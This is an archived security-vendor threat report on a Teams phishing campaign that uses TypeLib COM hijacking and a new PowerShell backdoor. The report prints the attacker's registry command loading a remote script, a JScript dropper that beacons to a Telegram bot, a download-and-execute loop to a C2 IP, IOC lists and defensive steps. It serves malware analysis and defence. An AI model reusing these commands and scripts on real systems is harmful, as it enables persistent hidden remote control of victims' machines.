{
	"id": "bf81ce37-f366-4db0-afac-0ca84ca5e800",
	"created_at": "2026-04-06T00:14:58.235568Z",
	"updated_at": "2026-04-10T03:35:13.808398Z",
	"deleted_at": null,
	"sha1_hash": "1be08a7577799c8cefd2bd74320f259fa8434e5f",
	"title": "Threat Spotlight: Hijacked and Hidden: New Backdoor and Persistence Technique - ReliaQuest",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 660965,
	"plain_text": "Threat Spotlight: Hijacked and Hidden: New Backdoor and\r\nPersistence Technique - ReliaQuest\r\nBy ReliaQuest Threat Research Team 11 April 2025\r\nPublished: 2025-04-11 · Archived: 2026-04-05 20:27:56 UTC\r\nIn March 2025, while investigating multiple customer incidents, ReliaQuest uncovered an attack chain that began\r\nwith familiar tactics but quickly escalated into a novel persistence method that involved hijacking the Component\r\nObject Model Type Library.\r\nThe attack also included the deployment of a malware we hadn’t encountered before. It targeted customers in the\r\nfinance and professional, scientific, and technical services sectors.\r\nEarly tactics in the attack align with those of “Storm-1811” (aka “STAC5777”), a threat group known to deploy\r\n“Black Basta” ransomware. However, the later phases deviate from the norm, suggesting that the group may be\r\nevolving with new techniques or possibly splintering.\r\nAttribution aside, the attack provided some key insights into threat actors’ evolving tactics that enterprises need to\r\nknow. Read on to discover:\r\nThe adversary’s precise targeting patterns in their Microsoft Teams phishing attacks.\r\nA never-before-seen TypeLib hijacking technique that installs the novel malware.\r\nThe unique behaviors of the new backdoor and insights into its development.\r\nKey Points\r\nReliaQuest investigated a new Microsoft Teams phishing campaign using techniques previously deployed by\r\nBlack Basta operators. However, the follow-on attack introduced entirely new methods, suggesting either\r\nevolution within the group or fragmentation among its members.\r\nWe identified a previously unreported persistence method leveraging TypeLib COM hijacking plus a new\r\nPowerShell backdoor, highlighting ongoing attacker efforts to evade detection and maintain access to\r\ncompromised systems.\r\nTo defend against these tactics, organizations should restrict external communication in Microsoft Teams and\r\nharden Windows systems to prevent malicious execution.\r\nAttack Lifecycle\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 1 of 15\n\nFigure 1: Infection chain observed in the attacks we investigated\r\nPrecision Phishing: Exploiting Timing, Power, and Gender\r\nThe attacks kicked off with the adversary sending phishing messages to our customers’ employees via Microsoft\r\nTeams (see Figure 1). While we don’t know the contents of the messages, the attacker used the fraudulent\r\nMicrosoft 365 tenant “techsupport[at]sma5smg.sch[.]id” with the display name “Technical Support” to pose as a\r\nmember of IT staff. With this disguise, the recipients were almost certainly tricked into thinking IT support needed\r\naccess to their system to fix a problem.\r\nSo far, so run-of-the-mill. We’ve seen these techniques used before by Storm-1811. In May 2024, the group posed\r\nas IT help staff in . By October 2024, it shifted to phishing via , which bypassed traditional email security\r\ngateways and exploited employees’ trust in enterprise chat tools. This tactic became its go-to method. After\r\ngaining access, the group deployed remote monitoring and management (RMM) tools, which ultimately led to the\r\nBlack Basta ransomware being used to extort organizations.\r\nThe Storm-1811 threat group specializes in conducting social engineering to gain initial access to facilitate the\r\ndeployment of Black Basta ransomware. Black Basta handles the encryption and ransom demands, resulting in\r\ntwo distinct but complementary components of the attack chain.\r\nHowever, these latest attacks had some features that indicated they were calculated strikes designed to exploit\r\nspecific gaps:\r\nPerfect Timing: The phishing chats were carefully timed, landing between 2:00 p.m. and 3:00 p.m.,\r\nperfectly synced to the recipient organizations’ local time and coinciding with an afternoon slump in which\r\nemployees may be less alert in spotting malicious activity.\r\ni\r\nHigh-Value Targets: The attacker didn’t cast a wide net. They zeroed in on executive-level employees like\r\ndirectors and vice presidents—people who hold the power and access hackers crave but whose busy\r\nschedules may make them less vigilant.\r\nGender Stereotyping: Employees with female-sounding names were the exclusive targets, suggesting the\r\nattacker may have been banking on research into the demographics of phishing susceptibility to maximize\r\ntheir success rate.ii\r\nOnce the victim took the bait, the attacker manipulated the employee into launching a remote support session\r\nthrough Windows’ built-in “Quick Assist” tool. This approach reflects a broader trend we observed in 2024, where\r\nlegitimate tools were used in 60% of hands-on-keyboard incidents. Leveraging Quick Assist as their gateway, the\r\nattacker employed an unusual persistence method that also launched the novel malware variant.\r\nHijacking TypeLib: New Persistence Method\r\nBefore we dive into the attacker’s unusual persistence technique, let’s define a few terms.\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 2 of 15\n\nTerm Definition\r\nComponent\r\nObject Model\r\n(COM)\r\nThe Microsoft technology Component Object Model (COM) lets software components talk\r\nto each other and share programs’ functionalities. Think of it this way: Instead of\r\ndeveloping a video decoder from scratch, a media player can use a prebuilt COM object,\r\nlike the \"mp4sdecd.dll\" file, to display MP4 videos. COM references these objects using\r\nunique Class Identifiers (CLSID). For example, the CLSID \"{2a11bae2-fe6e-4249-864b-9e9ed6e8dbc2}\" points straight to that video decoder, making it easy for the media player\r\nto plug it in and get to work.\r\nCOM\r\nhijacking\r\nIn COM hijacking, adversaries manipulate the Windows Registry by modifying a specific\r\nCLSID entry to redirect legitimate processes to malicious code. In the video decoder\r\nexample, hackers could tamper with the registry entry tied to the CLSID {2a11bae2-fe6e-4249-864b-9e9ed6e8dbc2} so that it points to a malicious DLL instead of the real one.\r\nThey can even configure the registry to reference external files hosted on URLs, making it\r\neven easier to load malicious scripts or payloads. The result? When a media player or any\r\nother application tries to load the COM object, it unknowingly runs the malicious DLL or\r\nexternal file instead. This isn’t just a one-time attack—it’s built for persistence, staying\r\nactive even after system reboots.\r\nTypeLib\r\nhijacking\r\nTypeLib, short for “Type Library,“ acts as a blueprint for COM objects—it holds metadata\r\nabout their methods (e.g., “Play,” “Pause,” “Stop”) and interfaces, enabling applications to\r\ninteract with them seamlessly. In TypeLib hijacking, attackers modify registry entries to\r\nredirect legitimate COM objects to malicious scripts or files. As a result, every time an\r\napplication interacts with the hijacked COM object, the attacker’s code is executed instead.\r\nThis technique is designed for persistence, ensuring the attacker’s foothold remains active\r\nwhenever the application is used, all while leveraging legitimate system functionality for\r\nstealth.\r\nSo how did the technique play out? Once the attacker gained control of the employee’s device, they used the\r\nfollowing command to start the TypeLib hijacking process. We’ve annotated aspects of the command you should\r\npay attention to:\r\nreg add\r\n1 \"\"HKEY_CURRENT_USER\\Software\\Classes\\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\r\n2 \\1.1\\0\\win64\"\" /t REG_SZ /d \"script:hxxps://drive.google[dot]com/uc?\r\nexport=download^\u0026id=1l5cMkpY9HIERae03tqqvEzCVASQKen63\r\n3 \" /f\r\n1. This Windows Registry command ( reg add ) adds a new key-value pair or updates an existing one in the\r\nWindows Registry. It can alter system-level configurations or application-specific settings, depending on\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 3 of 15\n\nthe registry path targeted.\r\n2. The command targets the TypeLib registry hive, which stores metadata about COM objects, including their\r\nCLSIDs. In this case, it’s referencing the CLSID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, a\r\nkey identifier tied to Internet Explorer components.\r\n3. The command assigns a remote URL to the registry key's value, prefixed with the script: moniker. This\r\nCOM-specific feature directs the system to load and execute scripts from the specified remote location,\r\nenabling the execution of malicious code.\r\nThe result of this command causes the malware hosted on the Google Drive URL to be downloaded and executed\r\nwhenever the hijacked COM object is accessed—whether by opening Internet Explorer, an application utilizing\r\nInternet Explorer components, or a system process indirectly invoking the COM functionality. To make matters\r\nworse, the Windows process “Explorer.exe” would reference this COM object every time it runs (see Figure 2),\r\nmeaning the malicious payload would be downloaded automatically on system restarts, ensuring the attacker’s\r\ncode stayed active and persistent, with the system doing all the work.\r\nFigure 2: Explorer.exe refencing the Internet Explorer COM object\r\nWe’ve seen security researchersiii demonstrate TypeLib hijacking as a practical proof of concept. We also\r\nobserved threat actors discussing the technique on cybercriminal forums. For instance, in October 2024, a user\r\nshared the same article we’ve cited here on the prominent Russian-language cybercriminal forum XSS, with most\r\nreplies expressing interest in the technique (see Figure 3). However, we hadn’t yet seen the technique play out in\r\nthe wild until we observed the attacks analyzed here.\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 4 of 15\n\nFigure 3: XSS users responding to TypeLib hijacking research\r\nBreaking Down the New PowerShell Backdoor\r\nAfter pulling off the TypeLib COM hijacking, a text file containing the malware (“5.txt”) from the Google Drive\r\nURL is downloaded. At the time of writing, the file has minimal malicious scoring on VirusTotal (see Figure 4),\r\nmeaning it could slip right under the radar without triggering any alarms in defensive software that relies on\r\nsignature-based detection, like an antivirus.\r\nFigure 4: Backdoor result on VirusTotal, showing low malicious scoring\r\nThe malware in the text file was packed with extensive “junk code”—non-functional content designed to throw\r\noff detection tools and analysis. This word salad contained several space-themed keywords like “Galaxy,”\r\n“Cosmos,” and “Orion.” The functional portion of the text file employs a unique, layered scripting approach in\r\nwhich PowerShell is wrapped with JScript code.\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 5 of 15\n\nExecution begins with JScript, which serves as the creator for the PowerShell backdoor. It writes the PowerShell\r\ncode, contained in the same text file, to the path “C:\\ProgramData\\kcnxrx.ps1” using the command “WriteLine,”\r\nas seen in the code below.\r\n\u003cscriptlet\u003e\r\n\u003cscript language=\"JScript\"\u003e\r\nvar extd = \"s1\"\r\nvar iiwjsp = \"C:\\\\ProgramData\\\\kcnxrx.p\" + extd;\r\nvar ljbvbg = gqvxvm.CreateTextFile(iiwjsp, true);\r\nljbvbg.WriteLine(\u003cPowerShellCode\u003e)\r\n\u003c---snippet-----\u003e\r\nOnce the PowerShell file is created, the JScript code executes the file in a hidden window not displayed to the\r\nuser. The PowerShell also bypasses execution policies that block unauthorized or untrusted scripts, ensuring the\r\nmalicious payload can run without restrictions.\r\nLastly, JScript code uses the “InstallProduct” method from the Windows Installer,\r\niv\r\n which is intended to use MSI\r\nfiles to install programs. However, the code abuses this functionality to instead send an HTTP request to the\r\nattacker’s Telegram bot with a message (in this case, \"qwe1bsrr5\"). This is likely to inform the attacker that the\r\nscript executed successfully, and that command-and-control (C2) is established.\r\n\u003c---snippet-----\u003e\r\nljbvbg.Close();\r\nvar djvatt = GetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process\");\r\nvar hlrcuc = GetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_ProcessStartup\");\r\nvar zpoqok = hlrcuc.SpawnInstance_();\r\nzpoqok.ShowWindow = 0;\r\nvar kcbfwv = djvatt.Create('powershell.exe -ep bypass -file \"' + iiwjsp + '\"', null, zpoqok);\r\nvar skJJFkj = new ActiveXObject(\"windowsinstaller.installer\");\r\nskJJFkj.UILevel = 2;\r\nskJJFkj.InstallProduct(\"https://api[.]telegram[.]org/bot7963974508\r\n1 :\r\nAAGyCacGCKKxa2fnWawtieZGtfg2VtKX5ps\r\n2 /sendMessage?chat_id=79351436523 \u0026text=qwe1bsrr5\");\r\n\u003c/script\u003e\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 6 of 15\n\n\u003c/scriptlet\u003e\r\n1. Bot Identifier: 7963974508\r\n2. Access Token: AAGyCacGCKKxa2fnWawtieZGtfg2VtKX5ps\r\n3. Chat ID: 7935143652\r\nThe PowerShell contained in the text file is obfuscated with junk code that has no functionality. Below, we’ve\r\nprovided a cleaned and condensed version for ease of readability.\r\n1.\r\n$gurynf = New-Object -Com \"Scripting.FileSystemObject\"\r\n$frtdtv = $gurynf.GetDrive(\"C:\").SerialNumber\r\n$frtdtv = \"{0:X}\" -f $frtdtv\r\n$frtdtv = [convert]::toint64($frtdtv, 16)\r\n$serial = $frtdtv\r\n$giezyzk = 'htt'\r\n$jikhdzg = 'p:/'\r\n$dsjvpni = '/18'\r\n$obhykml = '1.174'\r\n$felumga = '.164.'\r\n$ysapcoj = '180/'\r\n$ip = $giezyzk + $jikhdzg + $dsjvpni + $obhykml + $felumga + $ysapcoj\r\n$url = $ip + $serial\r\n2.\r\n$ryuuqj = New-Object Net.WebClient\r\n3.\r\nwhile ($true) {\r\ntry {\r\n$pupcyw = $ryuuqj.DownloadString($url)\r\nInvoke-Expression $pupcyw\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 7 of 15\n\n} catch {\r\nStart-Sleep -Seconds 5\r\ncontinue\r\n}\r\nStart-Sleep -Seconds 5\r\n}\r\n4.\r\n$tdnumg = New-Object Threading.Mutex($false, $frtdtv)\r\n$tdnumg.WaitOne(1)\r\n$tdnumg.ReleaseMutex()\r\n$tdnumg.Dispose()Release and dispose of the mutex 40$tdnumg.ReleaseMutex() 41$tdnumg.Dispose()\r\nWhen executed, the PowerShell performs the following actions:\r\n1. Constructs the C2 beacon URL with the infected device’s hard drive serial number ($ip+$serial) and\r\nconverts it to hexadecimal. This identifier is later referenced at the end of the C2 server URL (\r\n“181[.]174[.]164[.]180/Serial_ID”).\r\n2. Creates a WebClient object (Net.WebClient) for receiving commands or second-stage malware.\r\n3. Runs an infinite loop to download and execute provided commands or malware.\r\n4. Creates a Mutex derived from the infected system’s hard drive serial number to prevent the malware\r\nrunning multiple times and burning through system resources.\r\nFrom Bing Ads to Backdoors: The Rise of a New Threat\r\nWe dug into the attacker’s infrastructure and reviewed the PowerShell code to identify any potential overlaps with\r\nknown malware families. We found that the attacker has been developing versions of this malware since January\r\n2025, deploying early versions via malicious Bing advertisements.\r\nTelegram Bot Logs: We obtained a sample of the Telegram bot’s logs and uncovered some telling clues. Some\r\nlogs included syntax written in Russian, like “\u003cтекст_отправляемого_сообщения\u003e,” which translates to\r\n“\u003ctext_of_the_message_to_be_sent\u003e.” This indicates the malware developer is highly likely located in a Russian-speaking country. The chat logs also contained messages communicating live updates to the attacker on successful\r\ninfections. For example, one message contained the unique identifier “qwe1bsrr5” from the Telegram URL we\r\nreferenced earlier, indicating successful C2 on that host. For each compromised host, the bot fired off messages\r\nlike “qwe,” “qwe1,” and “qwe1calc”—totaling roughly 14 unique IDs and providing a peek into the digital trail of\r\nthe attacker’s growing reach that signifies the effectiveness of the new malware.\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 8 of 15\n\nCode Syntax: We conducted a search on VirusTotal for any malware that shares the same code syntax, such as\r\n“$ip+$serial.” We identified several versions, with the earliest being uploaded in January 2025, that had minimal\r\nfunctionality (see Figure 5). Some of the versions in February had the same features as the new malware we\r\ninvestigated but lacked obfuscation and had the C2 IP address of localhost (“$ip = hxxp://127.0.0[.]1”'), which is\r\nhighly likely the adversary uploading early samples to check for malicious scoring on VirusTotal. This indicates\r\nthat development and testing for the malware likely began in February 2025.\r\nFigure 5: Early versions of the malware seen in VirusTotal.\r\nThese testing versions appear to have been uploaded by a single submitter in Latvia (see Figure 6). However,\r\naccording to internal chat logs from the Black Basta operators leaked in February 2025, group members use VPNs\r\nand route traffic through Latvia. Although these upload records may not reflect the developer’s true location, they\r\nmay be a sign of early detection testing by the author.\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 9 of 15\n\nFigure 6: Early version of the malware uploaded to VirusTotal by user shown as located in Latvia\r\nFamily Ties: Some versions of the malware uploaded in January 2025 reference separate C2 servers from the\r\nactive campaign (e.g., \"5.252.153[.]15\"). These versions have minimal functionality and obfuscation but share\r\nsignificant code overlap with the malware we were investigating, as seen in the PowerShell script “pas.ps1”\r\nbelow.\r\n$fso = New-Object -Com \"Scripting.FileSystemObject\"\r\n$SerialNumber = $fso.GetDrive(\"c:\\\").SerialNumber\r\n$SerialNumber = \"{0:X}\" -f $SerialNumber\r\n$SerialNumber = [convert]::toint64($SerialNumber,16)\r\n$serial = $SerialNumber\r\n$ip = 'http://5[.]252[.]153[.]15/'\r\n$url = $ip+$serial\r\n$s = New-Object System.Net.WebClient\r\nwhile ($true) {\r\ntry {\r\n$result=$s.DownloadString($url)\r\ncatch {\r\nStart-Sleep -s 5\r\ncontinue\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 10 of 15\n\nInvoke-Expression $result\r\nThis infrastructure and associated PowerShell malware were previously used in a malicious Bing advertisement\r\ncampaign, reported by security researchersv in January 2025. The Bing ads tricked users searching for Microsoft\r\nTeams software downloading and running a malicious sideloaded DLL (TV.dll) along with a PowerShell-based\r\nmalware called \"Boxter.\" Given their significant overlaps, it is almost certain that this new malware is an\r\nevolution of Boxter and was deployed by the same adversaries responsible for the malicious Bing ads campaign in\r\nearly 2025. However, unlike the earlier campaign, the attacks used to deploy this new backdoor have no reported\r\nlinks to groups like Black Basta or Storm-1811. This indicates that it is realistically possible that a different group\r\nis responsible for the recent activity.\r\nKey Takeaways and What’s Next\r\nBecause ReliaQuest detected and responded to every attack attempt before impact occurred, we were unable to\r\ndiscover the attackers' affiliate relationships and ultimate goals. But there are a few possible conclusions we can\r\ndraw:\r\nThe Black Basta group adopted this new persistence method and malware for its attacks.\r\nOperators of the Black Basta ransomware group have splintered, with those who specialized in Microsoft\r\nTeams phishing and phone call techniques now collaborating with a different group that employs the new\r\nmethods described in this report.\r\nAn entirely different group has adopted the same initial access techniques that were previously used\r\nexclusively by Black Basta operators.\r\nWhether or not this Microsoft Teams phishing campaign was run by Black Basta, it’s clear that phishing through\r\nMicrosoft Teams isn’t going anywhere. Attackers keep finding clever ways to bypass defenses and stay inside\r\norganizations. This new malware highlights this ingenuity with its unique ability to be installed via TypeLib\r\nhijacking and to leverage multiple scripting languages for execution.\r\nStep Up Your Defenses\r\nYour Action Plan\r\nHere’s how to protect your organization from this campaign and any other attacks that use similar tactics:\r\nDisable external communication for Microsoft Teams to prevent phishing attacks targeting internal\r\nemployees. If external communication is required, use a whitelist for trusted domains. Ensure chat creation\r\nevents are being logged for Microsoft Teams to aid in detection and investigation.\r\nBlock “telegram[.]org” and “drive.google[.]com” at the network edge to prevent successful installation of\r\nthe malware involved in these incidents and disrupt C2 communications.\r\nDisable JScript via Group Policy or restrict it with AppLocker for departments and employees where it will\r\nnot disrupt operations, such as at the executive level.\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 11 of 15\n\nSet Windows Defender Application Control (WDAC) to the most restrictive level possible to enforce\r\nPowerShell's constrained language mode, limiting functions commonly exploited by malware.\r\nDisable Windows Script Host (WSH) via Group Policy to prevent scripts from being executed with\r\n\"wscript.exe\" or \"cscript.exe,\" blocking script-based malware that is downloaded and executed using the\r\n\"script:\" moniker. However, this change should be tested prior to deployment to ensure it does not disrupt\r\nsoftware or processes that rely on Windows Script Host.\r\nIOCs\r\nArtifact Details\r\n181.174.164[.]180 Malware C2 IP address\r\n130.195.221[.]182\r\n98.158.100[.]22\r\nMicrosoft Teams phishing IP addresses\r\nf74fac3e5f7ebb092668dc16a9542799ccacc55412cfc6750\r\nd0f100b44eef898\r\nMalware hash\r\ntechsupport[at]sma5smg.sch[.]id Microsoft Teams phishing tenant\r\n181.174.164[.]107\r\n181.174.164[.]140\r\n181.174.164[.]2\r\n181.174.164[.]240\r\n181.174.164[.]4\r\n181.174.164[.]41\r\n181.174.164[.]47\r\nAdditional identified C2 infrastructure\r\n5.252.153[.]15 Malicious Bing ads C2 servers\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 12 of 15\n\n5.252.153[.]241\r\n08b6bfc9a75a6bf94994936a4c3e6d6946a2437b31d8f6e8\r\n841a52df76397237\r\nff707131ff8cb4779afa66addd6efce3ce165e115806570cc3\r\nc2ed6df6be8de0\r\n074124df8f60cef79577cad43a3adef39a4f773c2f4b5e33e\r\n292992d410cc012\r\n41c3c83a0b39d91d2c35398113788eabcad2de36138304c\r\n812dce0282941b152\r\nf74fac3e5f7ebb092668dc16a9542799ccacc55412cfc6750\r\nd0f100b44eef898\r\nef9456ada1d93e7cfc1750be1afd68807d532b6e893edd5a\r\nd79f016affd29dd0\r\necfcca6de9fb12c2989f0a46a235f3de2c7b6f0be0a4822af9\r\n848ee21e3b541d\r\n7ddbf961dfbb78daee07b04111b8dedf693bb8807406cd2c\r\n442480c551d247e1\r\n2df636a9ebdc6799d494151915656dc302deeade7e7ddca\r\n2e2e414869777e740\r\n62faba34d0439b74ec716e62eb990063f3a03a5516de397\r\n6bfdd80cb0e39a76a\r\n9c13fbdbc450474d4477c397497c9b40be7b89a1b4f9dfc5\r\n7d764c7405301bb9\r\n1821e33b7355d857fe3af5b67cb651260fa010a12d5ebd8d\r\n30ad110b647b2e6b\r\nAdditional identified malware hashes based on\r\n“$ip+$serial” syntax\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 13 of 15\n\nf560e95fd233a8441c5195a3864c78d9ef5d3b9033a383c5\r\n55d7c1e3c30fca0a\r\ne68084a7eb869ef88cd61ec26537c7ca0433124cebfbd20a\r\nebc8b4330952c653\r\nb59e9d53ab73464e14d81f5a00e1c7580a99eed078a8dff4\r\n48b926de3f0df0e6\r\nbbd1afa9d0b142a0cc0ef7f1487eed512d538c79cd225e6c\r\na9ca77e0a85f1f60\r\ne7dd0d24a511cf8170840f8ebac3df3787ba3bfd97d136f4a\r\n18a115700d137ff\r\n3d0a09ba259d5f4b1e8d261fe05fef56b8611ba30edf46b7d\r\n927f8f0808b9c53\r\n6395a9b7be56159dc8d2fc2858b6f0fdcf63a1623ea426a4\r\n9625195123f5166f\r\n2b21d0a08fce188885520e610a68f06766729ea935631afc\r\n843747f1cee387ab\r\n291700be999ed8d361e9418a3375353c384999afc42271a\r\nffa7ecc395f137fc0\r\nec513db1dcd045444fb7282f382786d91ed3357d254797af\r\nacec8b7bab1f5070\r\n4dbd1bf6a07b97cb14cd4e2d78d09bc3561f225b64f99dc4\r\n0774959e6bd9de21\r\n7a0dea548c6cd0259ffb339865add2b739ab6441b1b5263\r\ne3787120b8622d286\r\nc09dffd32f233b9d65fe73432cfa29c1de9ea56cfd2f42b985\r\nf5e0cccfc0aa4f\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 14 of 15\n\n3c2c2d10650b98a7121c9d76e206fa1ffe81374e0594d226\r\nc0bf56eb17423825\r\n287e85989b76b8b395311575fc20cd18efa38571ccf94cec\r\n2a3d3d0683862d79\r\n7b89423831873906aa3f28507d1adbcca92b37dbb8a9be4\r\nf2d753ebc31467f33\r\nabfb7c3c3ea828bf85874c596cac17770668abb28734cbee\r\nc67dc8c958afd340\r\n3448da03808f24568e6181011f8521c0713ea6160efd05bff\r\n20c43b091ff59f7\r\ni\r\n hxxps://hoxhunt[.]com/blog/top-3-phishing-attack-factors-time-desktop-mobile\r\nii\r\n hxxps://lorrie.cranor[.]org/pubs/pap1162-sheng.pdf\r\niii\r\n hxxps://cicada-8[.]medium[.]com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661\r\niv\r\n hxxps://learn.microsoft[.]com/en-us/windows/win32/msi/downloading-an-installation-from-the-internet\r\nv\r\n hxxps://cybersecuritynews[.]com/fake-microsoft-teams-page-drops-malware-on-windows/\r\nHayden Evans is the primary author of this report.\r\nSource: https://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nhttps://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://reliaquest.com/blog/threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique/"
	],
	"report_names": [
		"threat-spotlight-hijacked-and-hidden-new-backdoor-and-persistence-technique"
	],
	"threat_actors": [
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bc98fce-5e1c-46d8-9d1a-64b5cb5febc3",
			"created_at": "2025-04-23T02:00:55.20526Z",
			"updated_at": "2026-04-10T02:00:05.307504Z",
			"deleted_at": null,
			"main_name": "Storm-1811",
			"aliases": [
				"Storm-1811"
			],
			"source_name": "MITRE:Storm-1811",
			"tools": [
				"Black Basta",
				"Cobalt Strike",
				"Quick Assist",
				"BITSAdmin",
				"PsExec",
				"Impacket",
				"QakBot"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434498,
	"ts_updated_at": 1775792113,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1be08a7577799c8cefd2bd74320f259fa8434e5f.pdf",
		"text": "https://archive.orkl.eu/1be08a7577799c8cefd2bd74320f259fa8434e5f.txt",
		"img": "https://archive.orkl.eu/1be08a7577799c8cefd2bd74320f259fa8434e5f.jpg"
	}
}